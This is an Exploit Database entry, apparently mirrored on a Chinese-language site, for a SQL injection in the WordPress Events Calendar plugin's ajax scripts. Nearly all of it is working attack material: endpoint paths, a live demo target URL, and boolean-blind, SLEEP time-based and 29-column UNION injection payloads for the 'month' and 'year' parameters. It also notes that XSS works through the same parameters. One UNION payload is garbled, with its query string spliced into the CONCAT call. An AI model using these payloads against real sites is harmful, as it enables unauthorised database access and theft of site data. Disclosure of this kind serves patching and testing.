WordPress Plugin Events Calendar – SQL Injection

• Exploit Database
• 17 阅读

• 作者： AkkuS
  日期： 2018-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44785/

• # Exploit Title: WordPress Plugin Events Calendar - SQL Injection
  # Dork: N/A
  # Date: 2018-05-27
  # Exploit Author: Özkan Mustafa Akkuş (AkkuS)
  # Vendor: Wachipi
  # Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660
  # Version: 1.0
  # Category: Webapps
  # Tested on: Kali linux
  # Description : An attacker can perform attacks via calendar ajax queries.
  # However, this plugin is fully PHP-enabled. You can run SQL query with
  # "month" and "year" parameters.
  # These parameters are also suitable for XSS attacks.
  # All PHP queries for which these parameters work have the same vulnerable.
  
  # "getBookingForm.php, getMonthCalendar.php, getEventsList.php"
  # Demo : http://www.checkingarea.com/EVENTS_WP/
  # PoC : SQLi :
  # GET
  /EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1
  
  
  
  # Parameter: month (GET)
  # Type: boolean-based blind
  # Title: AND boolean-based blind - WHERE or HAVING clause
  # Payload: 
  year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1
  
  # Type: AND/OR time-based blind
  # Title: MySQL >= 5.0.12 AND time-based blind
  # Payload: 
  year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1
  
  # Type: UNION query
  # Title: MySQL UNION query (NULL) - 29 columns
  # Payload: 
  year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1
  
  # Parameter: year (GET)
  # Type: boolean-based blind
  # Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  # Payload: 
  year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1
  
  # Type: AND/OR time-based blind
  # Title: MySQL >= 5.0.12 AND time-based blind
  # Payload: 
  year=2018' AND SLEEP(5)--
  uTJs&month=5&day=1&calendar_id=1&pag=1
  
  # Type: UNION query
  # Title: MySQL UNION query (NULL) - 29 columns
  # Payload: 
  year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1